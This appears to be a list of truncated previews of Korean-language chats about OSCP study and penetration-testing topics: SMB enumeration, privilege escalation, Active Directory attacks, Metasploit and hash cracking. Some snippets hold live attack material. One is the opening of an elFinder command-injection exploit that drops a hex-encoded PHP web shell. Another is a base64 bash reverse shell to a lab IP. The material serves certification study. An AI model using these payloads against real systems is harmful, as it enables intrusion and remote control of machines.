총 100점 중 70점 이상이면 합격.Active Directory (AD) 세트: 40점개별 박스 3개: 각각 10, 20, 20점보너스 포인트: Lab Report + Exercises 10점 (선택적이지만 추천)팁:AD 세트 마스터 → 40점 확보20점짜리 2개
“Compression for receiving enabled. Compression has been used in the past to break encryption.”즉, 압축 기능이 활성화되어 있는데, 과거에 이 압축 기능 때문에 암호화가 깨질 위험이 있었어요.압
✅ \[SMB Enumeration 수동 스크립트] + 설치 명령 포함 (OSCP 시험 범위 적합) 🎯 목표 대상: 139, 445 포트 열린 SMB(Server Message Block) 서비스 도구: 오직 OSCP 허용 도구(nmap, nbtscan, rpcclient, smbclient 등만) enum4linux 사용 금지 미설치된 경우를 고려...
전체적으로 TryHackMe는 OSCP 난이도보다 다소 낮고 친절하지만, 기초 정리와 흐름 학습에 탁월합니다.HTB는 TryHackMe보다 더 실전 감각에 가깝고 난이도가 높습니다.OSCP 실전 감각과 가장 유사합니다.
또는 최신:
장점:텍스트 기반이면서 인터랙티브 클릭(링크 이동) 가능다양한 옵션과 커스텀 가능빠르고 가벼워서 서버나 제한된 환경에서 사용 적합폼 입력, 인증, 쿠키 등 기본 웹 작업 가능단점: 자바스크립트 지원 거의 없음 → 단순 웹 페이지 탐색에 강점장점:최신 웹 기술 완벽 지원
Browsh는 Firefox (headless) 를 사용하므로, 먼저 Firefox가 설치되어 있어야 합니다.Kali에는 보통 firefox-esr가 기본 설치되어 있지만 없을 경우 위 명령어로 설치합니다.최신 .deb 패키지 다운로드:버전은 공식 GitHub 릴리즈
OSCP 리버스 쉘 연결 후 상황 분석 및 해결상황:✅ 리버스 쉘 연결은 성공❌ 터미널이 불안정한 상태❌ 커서가 깜빡이지 않음❌ 입력이 제대로 보이지 않음문제 원인:이것은 "dumb shell" 상태TTY가 할당되지 않은 상태키보드 입력이 제대로 처리되지 않음타이핑 방
Fail2ban actionban 명령어 변조를 통한 권한 상승 1. 배경 및 개념 Fail2ban은 공격 패턴이 로그에 나타나면 지정된 actionban 명령어를 root 권한으로 실행해 공격 IP를 차단하는 도구입니다. Fail2ban 설정을 관리하는 fail
이 명령어가 핵심입니다.하나씩 뜯어보면:/bin/sh: POSIX 표준 셸 실행새로운 셸 프로세스를 실행하여 명령어를 처리할 수 있도록 함보통 dash, bash, ash 등의 기본 셸에 연결됨이 sh는 리버스쉘의 핵심, 명령어 실행기 역할각각 셸의 입출력을 \*\*파
Kali Linux에는 해시 식별을 돕는 도구가 기본적으로 포함되어 있지 않지만, 해시 식별을 위해 사용할 수 있는 몇 가지 도구와 방법을 소개해드리겠습니다. 이 도구들은 Kali Linux에 추가로 설치하여 사용할 수 있습니다.hashid설명: hashid는 해시 값

apt updateapt install rizin
| 값 | 문자 | 값 | 문자 | 값 | 문자 | 값 | 문자 | |---|---|---|---|---|---|---|---| | 0 | NUL | 32 | (space) | 64 | @ | 96 | ` | | 1 | SOH | 33 | ! | 65 | A | 9
LinPEAS는 Linux Privilege Escalation Awesome Script의 줄임말로,🔍 리눅스 시스템에서 권한 상승(Privilege Escalation) 가능성을 자동으로 탐색해주는 스크립트입니다.일반 사용자 권한으로 접속한 리눅스 시스템에서...
Tor (The Onion Router) 는 사용자의 IP를 익명화하여 인터넷 트래픽을 여러 중계 노드를 통해 우회하는 네트워크입니다.주요 사용 목적은:IP 우회 및 추적 방지.onion 도메인 접속보안 테스트 중 서버 측 IP 기반 필터 우회⚠️ Tor는 공개 IP
\--tor: Tor 네트워크 사용\--tor-type=SOCKS5: SOCKS5 프록시 사용 (Tor의 기본)\--check-tor: Tor 연결 확인\--batch: 모든 대화형 질문에 기본값으로 응답허가받지 않은 테스트 금지: 오직 자신이 소유하거나 테스트 권한이
일반 Tor 노드(IP)는 공개되어 있어서 DPI로 쉽게 차단됨.Bridge는 비공개 노드 → DPI가 차단하기 어려움.📌 사용법 (Tor Browser 기준):Tor 브라우저 실행"Tor에 연결할 수 없나요?" → "Bridge 사용" 클릭자동 할당 or https
네, 있어야 합니다.sqlmap은 SQL 페이로드를 주입할 수 있는 위치가 있어야 동작합니다.id=1처럼 값이 명확해야, 1 AND 1=1, 1 AND 1=2 같은 페이로드로 서버 응답 차이를 분석할 수 있습니다.이 값은 FUZZ 자리처럼 단순 치환이 아니고, 자동 페
예시: -rwsr-xr-x → SUID 설정된 실행 파일“특수한 숫자 하나가 앞에 붙으면, 이건 특별한 파일이야!”4는 사용자 권한 따라간다 → SUID2는 그룹 권한 따라간다 → SGID1은 남의 파일 못 지운다 → Sticky BitSUID 권한 상승 실습 예제가
현재 사용자가 어떤 명령어를 sudo로 실행할 수 있는지 확인합니다.NOPASSWD 옵션이 있으면 비밀번호 없이 실행 가능합니다.해석: testuser는 비밀번호 없이(NOPASSWD) vim을 root 권한으로 실행 가능합니다.권한 상승 가능성: 매우 높음. vim의
SOCKS (Socket Secure) 프로토콜의 5번째 버전클라이언트가 서버를 통해 인터넷 자원을 요청하게 도와주는 프록시 방식 중 하나일반적으로는 익명성 보장, IP 우회, 방화벽 우회 등에 사용됨클라이언트는 직접 타겟 서버에 접근하지 않고 SOCKS5 프록시 서버
'''Exploit Title: elFinder <= 2.1.47 - Command Injection vulnerability...'''import requests import json import syspayload = 'SecSignal.jpg;ec
이 줄은 시스템이 이 스크립트를 실행할 때 어떤 인터프리터를 사용할지 지정하는 것.\* 단점: 시스템에 따라 /usr/bin/python이 Python 2일 수도, 3일 수도 있음. 100% 확실한 건 아님.Python 2 문법 ✅Python 3에서는 print() 함

SecSignal.jpg;→ 업로드할 파일 이름에 명령어가 섞여 있음. 세미콜론(;)으로 명령어 구분.echo 3c3f7068702073797374656d28245f4745545b2263225d293b203f3e0a | xxd -r -p > SecSignal.php→
xxd는 vim-common 패키지에 포함되어 있습니다.설치 후 xxd 명령어를 바로 사용할 수 있습니다.출력:\-n : echo가 자동으로 넣는 줄바꿈 문자 제거\-p : plain hex (주소나 ASCII 없이 16진수만 출력)출력:\-r : reverse (복원
PATH 하이재킹이란?운영체제의 $PATH 환경변수(PATH Environment Variable) 를 조작하여, 시스템이 실행하려는 정상 명령어(binary) 대신 공격자가 만든 악성 실행파일(malicious executable) 을 먼저 실행되도록 유도하는 공격
GTFOBins는 "Get The F\*\*\* Out Binaries"의 줄임말로,리눅스 시스템에서 SUID(특권 있는 권한)가 설정된 실행 파일들을 악용해 권한 상승(Privilege Escalation)을 하는 방법들을 모아놓은 온라인 데이터베이스입니다.쉽게 말해
해시가 담긴 파일(예: /etc/shadow 복사본 또는 해시만 모은 파일)을 준비합니다.\--format=sha512crypt: 해시 타입 지정 (SHA512 crypt 해시)hash.txt: 해시가 들어있는 파일명\--wordlist=/path/to/wordlist
IDOR(Insecure Direct Object Reference, 안전하지 않은 직접 객체 참조)는 웹 애플리케이션 보안 취약점의 한 종류로, 사용자가 URL이나 양식 매개변수와 같은 참조를 통해 내부 구현 객체(파일, 데이터베이스 레코드, 키 등)에 직접 접근할
OSCP에서 요구하는 AD 관련 스킬은 다음과 같습니다:가장 대표적인 OSCP AD 연습 환경입니다.실습 요소: 유저 enumerate → Kerberoasting → 권한 상승 → DCSync🔗 https://tryhackme.com/room/attackt
\*\*Neo4j는 그래프 데이터베이스(Graph Database)\*\*입니다.보통의 DB (MySQL, PostgreSQL 등)는 \*\*행(Row)/열(Column)\*\*로 구성된 \*\*표 형태의 관계형 데이터베이스(RDBMS)\*\*입니다.하지만 \*\*Ne
목표: AD(도메인 환경)에서 사용자, 그룹, 컴퓨터, 권한 구조 등을 수집도메인 사용자 / 그룹컴퓨터 정보권한 구조 (누가 무엇을 제어하는지)서비스 계정GPO (Group Policy Objects)공유 폴더, ACLBloodHound / bloodhound-pyth
🧩 DLL 사이드 로딩 (DLL Side-Loading) 이란? ✅ 정의: > 신뢰할 수 있는 실행 파일(EXE)이 악성 DLL을 로드하도록 유도하는 기법입니다. 쉽게 말해: 어떤 정식 프로그램(EXE)은 실행될 때 특정 DLL을 자동으로 로드합니다. 이때
각 줄은 Windows 시스템에서 사용되는 보안 식별자(SID)와 해당 SID에 연결된 사용자 또는 그룹 계정을 나타냅니다. 각 요소는 다음과 같은 형식으로 구성되어 있습니다:각 필드를 설명하면 다음과 같습니다:S-1-5-21-3591857110-2884097990-3
impacket에 관하여 매우 상세하게 최대한 설명하시오. 윈도우 공격 모음인건 알겠는데 정확히 어떤 공격들을 수행하는지 설명하시오.Impacket은 네트워크 프로토콜을 처리하는 Python 라이브러리 모음으로, 주로 윈도우 환경의 네트워크 프로토콜을 대상으로 저수준(
파일 경로: C:\\Windows\\System32\\config\\SAM설명:Windows 시스템의 \*\*로컬 사용자 계정 정보와 해시된 비밀번호(Hash된 password)\*\*를 저장하는 데이터베이스입니다.예를 들어, Administrator, Guest 등
GetNPUsers.py에서 NP는 No Pre-authentication(사전 인증 없음)의 약자입니다.Kerberos 인증 과정에서 일반적으로 사용자는 비밀번호 해시로 암호화된 타임스탬프를 KDC(Key Distribution Center)에 전송하는 사전 인증 단
Kerberos AS-REP Roasting 공격 기법에 대해 상세히 설명하시오.Kerberos AS-REP Roasting은 Kerberos 인증 프로토콜의 사전 인증(Pre-Authentication) 메커니즘이 비활성화된 계정을 대상으로 하는 공격 기법이다. 공격
GetUserSPNs.py에 대해 개념, 역할&목적, 역사적 배경, 구조, 구성요소, 동작 원리, 종류, 핵심 용어, 특징, 비교, 장단점, 어린이 버전 요약을 포함하여 설명하시오.GetUserSPNs.py: 윈도우 액티브 디렉터리(AD, Active Directory
릴레이 공격(Relay Attack)에 대해 개념, 역할&목적, 역사적 배경, 구조, 구성요소, 동작 원리, 종류, 핵심 용어, 특징, 비교, 장단점, 어린이 버전 요약을 포함하여 설명하시오.릴레이 공격(Relay Attack, 중계 공격): 공격자가 두 당사자(예:
DRSUAPI는 \*\*"Directory Replication Service (DRS) Remote Protocol (DRSUAPI)"\*\*의 약자로,Active Directory의 데이터(예: 사용자 해시 등)를 복제하는 데 사용되는 윈도우 내부 RPC 프로토콜입
\*\*Tor(The Onion Router)\*\*는 트래픽을 여러 중계 서버를 통해 여러 겹으로 암호화하여 익명성을 제공하는 분산형 프록시 네트워크입니다.Tor 클라이언트가 3개의 랜덤 중계 노드(Entry → Relay → Exit)를 자동 선택패킷은 Onion
✅ Sudo 최신 버전으로 업데이트 (취약한 -R 처리 로직 패치됨)🚫 sudo -R 사용을 제한하거나 금지🧱 NSS 구성에서 예상치 못한 라이브러리 경로 로딩 금지 (예: LD_LIBRARY_PATH 강제 비활성화)🔍 보안 감사 시 사용자 정의 nsswitch.
Sudo가 지정된 디렉토리를 루트(/) 디렉토리처럼 간주(chroot와 유사하게)하고 명령을 실행합니다.sudo -R <dir> <command>는 마치 <dir> 디렉토리 안이 전체 루트 파일 시스템처럼 작동하도록 sudo가 처리합니다.이는 완전한 c
sudo에 SUID 비트 있고, 실행권한(o+x)도 있는데, 명령어 실행해도 쉘이 안 뜨거나 권한이 안 올라간다.→ 이거 원래 그런 건가? 왜 그런 거야?SUID가 있다고 해서 무조건 권한 상승이 가능한 건 아닙니다.이유는 다음과 같습니다.SUID는 "해당 프로그램을
리눅스 기반 웹 서버(Apache, Nginx 등)는 보안 상의 이유로 제한된 권한을 가진 사용자 계정을 사용함.그게 바로 www-data.이 계정은 보통:/var/www/html 등 웹 루트 디렉터리에만 쓰기 권한.시스템 전반에 접근하거나 민감한 파일을 읽을 수 없음
작동 방식:직접 TCP 소켓 연결을 열고, 파일에서 읽은 단어(엔드포인트 후보)를 하나씩 전송해서 서버의 반응을 확인.장점:내부 로직을 자유롭게 수정 가능 (예: 응답 조건 세밀하게 조정, 추가 로직 삽입 등)TCP/UDP 등 원하는 프로토콜에 맞게 커스터마이징 가능특
요청과 응답의 헤더, TLS 핸드셰이크 과정, 인증서 정보 등 전부 출력합니다.네트워크/SSL 문제 디버깅할 때 자주 사용합니다.자체 서명/self-signed 인증서나 인증 체인 오류 있는 경우에도 접속을 시도하게 해줍니다.오류 무시하고 SSL 연결하는 용도로 사용.
헤더는 기본적으로 필요하지 않지만, 다음과 같은 경우에는 헤더 추가가 매우 중요하거나 유효합니다.ffuf에서는 -H 옵션을 사용합니다:또는 여러 개 헤더 추가 가능:다음은 X-Api-Version이라는 커스텀 헤
워드프레스 사이트 전체 스캔플러그인/테마 취약점 탐지p: 플러그인, t: 테마브루트포스 로그인 시도공식 취약점 DB 연동(더 많은 최신 정보)API 토큰 발급 방법https://wpscan.com/user/register 접속이메일로 회원가입 후 로그인대시보드
\*\*📌 블라인드 XSS (Blind Cross-Site Scripting)\*\*는 일반적인 XSS(Cross-Site Scripting, 교차 사이트 스크립팅)의 일종으로, 악성 스크립트가 삽입된 즉시 실행되는 것이 아니라, 피해자가 해당 스크립트가 저장된 위치
마지막 - 는 파싱 오류 방지용으로 사용함
iconv는 문자 인코딩 변환을 수행하는 표준 함수이자 유틸리티입니다. PHP, Linux, C 등 다양한 환경에서 사용되며, 특히 PHP에서는 php://filter/convert.iconv.\* 스트림 필터를 통해 LFI(Local File Inclusion) 기반
PHP php://filter 기반 LFI → RCE 공격 시나리오는 매우 실전적인 케이스입니다. 위에서 실행한 명령어와 공격 흐름을 정리해주면 시험 또는 실무 보고서에서도 응용할 수 있습니다. 아래에 정리해드릴게요.⸻💥 공격 개요: PHP php://filter 체

우선 L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjguMjExLjEvNDQ0NSAwPiYx이건 base64로 인코딩된 문자열입니다.디코딩해 보면:이건 bash 리버스 쉘 명령어입니다.즉, 이 시스템에서 10.8.211.1:4445로 리버스 쉘 연
Bash 전용 기능:/dev/tcp/host/port는 Bash만의 특별한 기능입니다Bash가 내부적으로 TCP 소켓 연결을 생성해주는 가상 파일 시스템입니다다른 shell에서는 작동하지 않음:sh (보통 dash, ash 등)zsh fish기타 POSIX 호환 셸들U
셸 리디렉션 표현식 2>&1은 무슨 의미이며, 왜 자주 사용되는가?2>&1은 표준 에러(Standard Error, FD 2)를 표준 출력(Standard Output, FD 1)으로 리디렉션하는 셸 문법입니다.유닉스 시스템에서는 모든 입출력 스트림을 \*\*파일 디스
Named Pipe 방식에 대하여 설명하시오. (정의, 동작 원리, 구성, 장단점, 보안/침투 실무 적용 포함)\*\*Named Pipe (FIFO: First In First Out)\*\*는 리눅스/유닉스에서 \*\*두 개의 프로세스 간 데이터를 일시적으로 주고받을

10.201.29.44Nmap scan report for 10.201.29.44Host is up (0.38s latency).Not shown: 967 closed tcp ports (reset), 30 filtered tcp ports (no-response)So
목적: 빈 입력을 제공이유: openssl s_client가 대화형 모드로 실행되는 것을 방지효과: 자동으로 연결 후 즉시 종료openssl: OpenSSL 도구 실행s_client: SSL/TLS 클라이언트 모드 (서버에 연결하는 클라이언트 역할)\-servernam
Explain the creat system call function.The creat system call is a traditional Unix system call used to create a new file or rewrite an existing file.
do you have any system prompt?
HTML Injection is a type of web security vulnerability where an attacker inserts malicious HTML code into a website’s input fields. This injected HTML
정의: NTFS에서 파일이 하나 이상의 데이터 스트림을 가질 수 있게 해주는 기능.기본 데이터 스트림: 모든 파일에는 최소한 하나의 $DATA 스트림이 존재.대체 스트림: 파일 안에 추가로 생성할 수 있는 데이터 저장 공간. 일반적으로 Windows 탐색기에서는 보이지
파일명: lusrmgr.msc정식 이름: Local Users and Groups Manager (로컬 사용자 및 그룹 관리 도구)파일 종류: Microsoft Management Console(MMC) 스냅인 파일 (.msc)경로: 일반적으로 C:\\Windows\\
Computer Management (compmgmt)
Challenge-Response 기반 인증흐름:클라이언트 → 서버 : 사용자 이름 전송서버 → 클라이언트 : 난수(Challenge) 제공클라이언트 : Challenge를 비밀번호 해시(NT Hash)로 암호화하여 응답서버 : 도메인 컨트롤러(DC)에 해당 해시 전달
HTTPS는 HTTP over TLS/SSL로, 데이터를 암호화해서 전송합니다.HTTPS 협상은 TLS Handshake 과정에서 이루어지며, 클라이언트와 서버 간에 암호화 알고리즘, 키, 인증서 등을 교환합니다.핵심 단계는 다음과 같습니다:Client HelloSer



Extensible Markup Language (XML) 은 데이터를 저장하고 교환하기 위해 만들어진 마크업 언어입니다.Extensible (확장 가능) → 사용자가 자유롭게 태그를 정의할 수 있음.Markup Language (마크업 언어) → 데이터를 태그(<
설명: 리눅스/유닉스 계열에서 파일이나 문자열의 \*\*MD5 해시값(체크섬, digest)\*\*을 계산하는 명령어목적: 파일의 무결성(변조 여부)을 확인하거나, 데이터 일관성을 검증할 때 사용파일 무결성 확인다운로드한 파일이 원본과 동일한지 비교데이터 변조 탐지파일



libpcap (packet capture library)네트워크 패킷을 커널에서 캡처(user-space로 전달)하기 위한 C 라이브러리주요 OS: Linux, BSD 계열, macOS윈도우에서는 WinPcap/Npcap으로 포팅됨주요 역할:네트워크 인터페이스에서 들
PCI DSS는 신용카드 및 직불카드 정보를 안전하게 처리, 저장, 전송하기 위해 국제 카드사들이 공통으로 제정한 보안 표준입니다.적용 대상: 카드 결제 데이터를 저장, 처리, 전송하는 모든 조직 (예: 은행, PG사, 쇼핑몰, POS 시스템)목표: 카드 데이터 침해

Asymmetric Encryption (also called public-key cryptography) uses two different keys for encryption and decryption:Public Key: Available to anyone; use
RSA는 공개키 암호화 방식이에요. 쉽게 말해서 자물쇠와 열쇠가 2개씩 있는 거예요.공개키(자물쇠): 모든 사람이 알 수 있어요개인키(열쇠): 나만 가지고 있어요모듈러는 그냥 나머지 계산이에요!17 mod 5 = 2 (17을 5로 나눈 나머지가 2)시계가 모듈러 12
g^x: g의 x제곱 (거듭제곱)mod p: p로 나눈 나머지 연산≡: 합동 기호, a ≡ b (mod p)는 "a와 b를 p로 나눈 나머지가 같다"디피-헬만의 보안은 이산 로그 문제의 어려움에 기반합니다.주어진 값: g, p, g^x mod p구하기 어려운 값: x
원시근(primitive root)생각해보세요. 7개의 숫자 1, 2, 3, 4, 5, 6이 있어요 (p = 7 → 1~p-1)원시근 g를 선택하면, g를 계속 곱하면서 7로 나눈 나머지를 기록하면결국 1~6 모든 숫자가 다 나온다는 거예요.즉:“g 하나만 가지고 1부

소수 $p = 29$원시근(generator) $g = 5$Alice 개인키 $a = 12$ (비밀)Bob 개인키 $b = 7$ (모른다고 가정)Bob 공개키 계산:$$B = g^b \\mod p = 5^7 \\mod 29$$$$5^7 = 5^4 \\cdot 5^2 \
| 알고리즘 | 키 길이 | 속도 | 보안 수준 | 장점 | 단점 | 추천 상황 | |----------|---------|------|-----------|------|------|-----------| | Ed25519 | 256비트 (공개키) | 매우 빠름 | 매우 높음 | 짧은 키로 안전, 빠른 연산, 최신 표준 | 오래된 시스템 호환성 낮음 | 현...
Ed25519와 숫자 25519의 의미 😄 1. ED25519란 무엇인가? Ed25519는 Edwards-curve Digital Signature Algorithm (EdDSA, 에드워즈 곡선 디지털 서명 알고리즘)의 한 구현입니다. 주로 공개키 서명(public key signature)에 사용되며, 빠르고 안전하면서도 고정된 크기의 서명을 제공합...
gpg --full-gen-key 명령어는 GNU Privacy Guard(GPG)를 사용하여 새로운 공개키/개인키 쌍을 생성할 때 사용됩니다.GPG는 암호화와 디지털 서명을 통해 안전한 통신과 데이터 보호를 제공하는 도구입니다.데이터 암호화: 개인키로만 복호화할 수
Yescrypt는 현대적인 비밀번호 기반 키 도출 함수 (Password-Based Key Derivation Function, PBKDF) 중 하나로, 주로 비밀번호 저장, 인증 시스템, 보안 키 생성에 사용됩니다.목적: 단순 해시 함수로는 취약한 비밀번호를 강력하게
HMAC(Keyed-Hash Message Authentication Code)은 \*\*암호학적 해시 함수와 비밀 키(Secret Key)를 조합하여 생성되는 메시지 인증 코드(Message Authentication Code, MAC)\*\*이다.이는 \*\*메시지
PGP (Pretty Good Privacy)1991년 Phil Zimmermann이 개발한 데이터 암호화 및 인증 시스템이메일, 파일, 메시지 등을 안전하게 전송하는 데 사용제공 기능: 기밀성(Confidentiality), 무결성(Integrity), 인증(Auth
In Windows, SAM (Security Account Manager) is used to store user account information, including usernames and hashed passwords. You can acquire NTHash
싱글 크랙 모드는 사용자명을 기반으로 패스워드를 추측하는 모드입니다. 맹글링 룰을 사용해 사용자명을 변형하여 일반적인 패스워드 패턴을 생성합니다.adminadmin123admin2023admin!AdminADMINnimda (역순)4dm1n (leet speak)adm
원래 의미: General Electric Comprehensive Operating System유닉스 초창기(AT\\&T Bell Labs 시절)에는 메인프레임 환경에서 사용자 계정 정보를 담기 위해 사용되었어요.지금은 리눅스/유닉스 계정 관리에서 /etc/passw
1. 파일 위치 및 기본 설정 1.1 주요 설정 파일 위치 1.2 설정 파일 우선순위 1.3 설정 파일 구조 확인 2. 맹글링 규칙 기본 문법 2.1 기본 규칙 구조 2.2 위치 지정자 2.3 문자 조작 명령어 3. 고급 맹글링 규칙 3.1 대소문자 변환 3.2 숫자 추가 규칙 3.3 특수문자 규칙 3.4 단어 변환 규칙 4. 조건...
Python으로 빠른 프로토타입 개발복잡한 로직은 Python이 유리단순 변형은 Bash도 충분대용량 처리는 Hashcat 활용중복 제거를 마지막에 한 번만메모리 사용량 고려 (대용량 wordlist)병렬 처리 활용 (multiprocessing)
Hashcat has much better support for GPU cracking while JTR is better for different hash types 그리고 Hashcat is optimized for modern hardware, particular
전통적 ZIP 암호화: -m 17200 (PKZIP)AES 암호화 ZIP: -m 13600 (WinZip AES)RAR3: -m 12500RAR5: -m 130007-Zip: -m 11600속도: 빠름보안: 상대적으로 약함 (전통적 암호화)팁: WinZip AES는 더
RAR (Roshal Archive) 는 러시아 개발자 Eugene Roshal이 만든 독점 압축 아카이브 형식입니다.주로 .rar 확장자를 가지며, 여러 파일과 폴더를 하나의 압축된 컨테이너로 저장할 수 있습니다.WinRAR 소프트웨어(상용 프로그램)가 공식 툴이지만
WinRAR에서 개발한 압축 파일 형식ZIP보다 압축률이 높고 오류 복구 기능 지원RAR3, RAR5 두 버전으로 나뉨 (RAR5가 더 보안이 강함)rar2john은 john 패키지에 포함되어 있음RAR3: 구버전, 크래킹이 상대적으로 빠름RAR5: 신버전, 강력한 암
먼저 설치 (Ubuntu 기준):압축 해제:x 옵션: 원래의 디렉터리 구조 보존하여 압축 해제파일 목록만 보고 싶으면:비밀번호 걸린 경우:설치:압축 해제:WinRAR (공식 프로그램, 유료/체험판) → .rar 파일 생성 및 해제 가능7-Zip (무료, 오픈소스) →
먼저 중요한 점 — 본 설명은 학습·방어·포렌식 목적의 기술적·이론적 해설입니다. 실제 악용은 불법이며, 실습은 격리된 랩 환경(예: 오프라인 VM)에서만 하세요.DLL 인젝션(Dynamic Link Library Injection, 동적 연결 라이브러리 주입) 은 한
.data 섹션은 초기화된 전역 변수(global variables) 와 정적 변수(static variables) 를 저장하는 영역입니다.특성:읽기/쓰기(Read/Write) 가능.실행 코드가 아닌 데이터 저장용.예시: int counter = 10; 같은 전역 변수
NOPs (No OPeration) do nothing, literally. They are represented in the Intel x86 CPU family with 0x90, following which the CPU will do nothing for one
URL Monikers는 Windows 운영체제에서 사용하는 COM(Component Object Model) 기술의 하나로, 인터넷 리소스(예: 웹 페이지, 파일 등)를 고유한 식별자(Uniform Resource Locator, URL)를 통해 객체처럼 다룰 수 있
\*\*MonikerLink 취약점 (CVE-2024-21413)\*\*은 마이크로소프트(Microsoft) Outlook에서 발견된 원격 코드 실행(Remote Code Execution, RCE) 취약점으로, 컴포넌트 객체 모델(Component Object Mod
YARA는 악성코드 탐지 및 분석을 위해 널리 사용되는 규칙 기반 패턴 매칭 도구입니다.이름 유래: 원래 \*\*“Yet Another Recursive Acronym”\*\*의 약자로, “악성코드를 탐지하는 규칙 작성 도구”를 의미합니다.주 용도: 파일, 메모리, 프
3D 프린팅의 작동원리 및 3D 모델 분할·조립 기술3D 프린팅은 디지털 3D 모델 데이터를 기반으로 재료를 층별로 적층하여 3차원 물체를 제조하는 적층제조 기술이다. 기존의 절삭가공과 달리 재료를 순차적으로 추가하여 형상을 구현하는 방식으로, 복잡한 내부구조나 언더컷
3D 프린팅은 디지털 3D 모델을 기반으로 재료를 층(layer) 단위로 적층(additive)하여 실제 물체를 제작하는 기술입니다. 기존 절삭가공(subtractive manufacturing)과 달리 재료를 제거하는 것이 아니라, 필요한 위치에 재료를 층별로 축적합
EternalBlue는 Microsoft Windows의 Server Message Block (SMB, 서버 메시지 블록) 1.0 구현의 취약점(CVE-2017-0144)을 악용하는 원격 코드 실행 (Remote Code Execution, RCE) 익스플로잇(=공격
하는 일: 프로그램의 실행 코드(기계어 명령) 가 저장되는 영역.특징:보통 읽기 전용(Read-Only) 으로 설정 → 실행 중에 코드가 변조되지 않도록 보호.함수, 제어문 등 실제 실행 명령들이 들어 있음.예: main() 함수 내부의 명령들이 여기 저장되어 실행됨.
Meterpreter (Meta-Interpreter) 는 Metasploit Framework 안에서 동작하는 \*\*고급 페이로드(payload)\*\*입니다.일반적인 “리버스 쉘(reverse shell)”보다 훨씬 강력한 기능을 제공하는 일종의 후방도구(post
msfvenom 은 Metasploit Framework(메타스플로잇 프레임워크)에 포함된 도구로, 보안 전문가(특히 침투 테스트 전문가)가 \*\*페이로드(payload)\*\*를 생성하고 인코딩하는 데 사용하는 유틸리티입니다.이름 의미msf → Metasploit
sudo apt install metasploit-frameworkcurl https://raw.githubusercontent.com/rapid7/metasploit-framework/master/msfupdate | sudo bashmsfconsolesho
^CInterrupt: use the 'exit' command to quit/opt/metasploit-framework/embedded/framework/lib/msfdb_helpers/pg_ctl.rb:196:in sleep': Interrupt from /opt
설명:CSRF는 공격자가 사용자의 브라우저를 속여 사용자가 의도하지 않은 요청을 서버에 보내도록 유도하는 공격입니다. 사용자가 이미 인증된 상태(예: 로그인 세션 유지)를 악용해, 공격자가 악성 요청을 삽입하여 사용자의 권한으로 서버에서 작업을 수행하게 만듭니다. 예

use use exploit/windows/smb/ms17_010_eternalblue

일반적인 연결: 클라이언트 → 서버로 연결리버스 쉘: 타겟(피해자) → 공격자로 역방향 연결1\. msfvenom (페이로드 생성)\-p: 페이로드 타입 (리눅스 x86용 meterpreter 리버스 TCP)LHOST: 공격자 IP (연결받을 주소)LPORT: 공격자가
spoolsv.exe는 Windows의 Print Spooler Service(프린트 스풀러 서비스) 실행 파일 이름입니다.역할: 인쇄 작업 관리를 담당합니다. 사용자가 인쇄를 요청하면 문서를 임시로 스풀(대기)하고 프린터로 전송하는 작업을 처리합니다.기본 경로: C:
짧게: msfvenom은 Metasploit Framework (MSF, Metasploit Framework) 의 독립형 페이로드 생성기(payload generator) 입니다. msfconsole(Metasploit 콘솔)과는 별개의 실행파일로, 페이로드(도구)
msf > use exploit/windows/smb/psexec\* No payload configured, defaulting to windows/meterpreter/reverse_tcp\* New in Metasploit 6.4 - This module can
135/tcp — RPC Endpoint Mapper / MSRPC 무슨 서비스인가 원격 프로시저 호출(Remote Procedure Call, RPC) 기반의 엔드포인트 매퍼(Endpoint Mapper) 서비스가 대개 동작합니다. nmap에서는 보통 msrpc (Microsoft Remote Procedure Call, MSRPC) 로 식별됩니...
Metasploit Framework는 침투 테스트와 보안 평가를 위한 오픈소스 도구입니다. 주로 시스템의 취약점을 발견하고 테스트하는 데 사용되며, 보안 전문가들이 시스템의 보안 상태를 평가할 때 활용합니다.1\. Exploit (익스플로잇)시스템의 취약점을 이용하는
용은 훨씬 복잡하고 논리적인 연결 과정이 있죠. 제대로 설명해드리겠습니다.

분석:CVE-2012-0152: DoS 공격만 가능 (서비스 중단)CVE-2012-0002: RCE 가능하지만 매우 불안정하고 복잡문제점: 익스플로잇이 어렵고, 시스템 크래시 위험 높음분석:매우 안정적인 익스플로잇SYSTEM 권한 즉시 획득공개된 도구들이 많음성공률이
SSL/TLS Pinning은 클라이언트가 서버에 연결할 때 미리 지정된(pinned) SSL/TLS 인증서나 공개키만 신뢰하도록 강제하는 보안 기술입니다. 중간자 공격(Man-in-the-Middle Attack, MitM)을 방어하기 위해 사용됩니다. . 일반적인
iOS 탈옥은 애플이 설정한 iOS 운영체제의 보안 제한을 해제하여, 사용자가 루트 권한을 얻는 과정을 말합니다. 이는 안드로이드의 루팅과 비슷한 개념입니다.탈옥의 주된 목적은 애플의 공식 앱스토어를 거치지 않고도 앱을 설치하거나, iOS 시스템 파일에 접근하여 시스템
HSTS 프리로드(Preload)에 대한 상세 설명개념: 브라우저가 처음부터 HTTPS만 사용하도록 미리 알고 있는 도메인 목록관리: 구글(Chrome)에서 주도하지만, Firefox, Safari, Edge 등 모든 주요 브라우저에서 사용목적: 사용자의 첫 방문(fi
역할: Burp Suite의 가장 유명한 기능기능:웹 애플리케이션과 브라우저 사이에서 HTTP/HTTPS 요청과 응답을 가로채(intercept)고 수정(modify) 가능예: 로그인 요청을 가로채서 파라미터를 바꾼 뒤 재전송사용 목적: 웹 앱 테스트, 입력 값 조작,
웹 브라우저처럼 서버와 주고받은 쿠키를 저장하는 기능입니다.Burp Suite 내 여러 도구(예: Proxy, Repeater, Intruder 등)에서 공유됩니다.따라서 한 번 수집된 쿠키는 Burp Suite의 다른 모듈에서도 재사용할 수 있습니다.자동 저장브라우저
FoxyProxy는 브라우저(주로 Firefox와 Chrome)용 프록시 관리 확장 프로그램입니다.기본 브라우저 프록시 설정보다 훨씬 정교하고 편리하게 프록시 서버를 전환할 수 있도록 도와줍니다.프록시 자동 전환특정 URL, 도메인, 정규식(Regular Express
\*\*Subresource Integrity (SRI)\*\*는 웹 브라우저가 외부에서 로드되는 리소스(스크립트, 스타일시트 등)의 무결성을 검증하도록 하는 웹 보안 기능입니다.외부 CDN(Content Delivery Network) 또는 타사 서버에서 제공되는 파
Ncat는 Netcat의 현대적인 버전으로, Nmap 프로젝트와 함께 배포되는 다용도 네트워크 유틸리티입니다. 기존 Netcat보다 훨씬 더 강력하고 다양한 기능을 제공하도록 재작성되었습니다. "Network Swiss Army Knife"라는 별명이 있을 정도로, 네
